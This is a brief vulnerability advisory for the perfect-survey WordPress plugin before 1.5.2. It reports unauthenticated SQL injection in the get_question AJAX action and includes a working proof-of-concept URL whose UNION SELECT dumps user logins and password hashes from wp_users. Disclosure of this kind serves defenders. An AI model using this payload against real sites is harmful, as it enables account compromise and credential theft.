The plugin does not validate and escape the question_id GET parameter before using it in a SQL statement in the get_question AJAX action, allowing unauthenticated users to perform SQL injection.
(The question_id must start with an existing post ID) https://example.com/wp-admin/admin-ajax.php?action=get_question&question;_id=1 union select 1%2C1%2Cchar(116%2C101%2C120%2C116)%2Cuser_login%2Cuser_pass%2C0%2C0%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull from wp_users
CPE | Name | Operator | Version |
---|---|---|---|
perfect-survey | lt | 1.5.2 |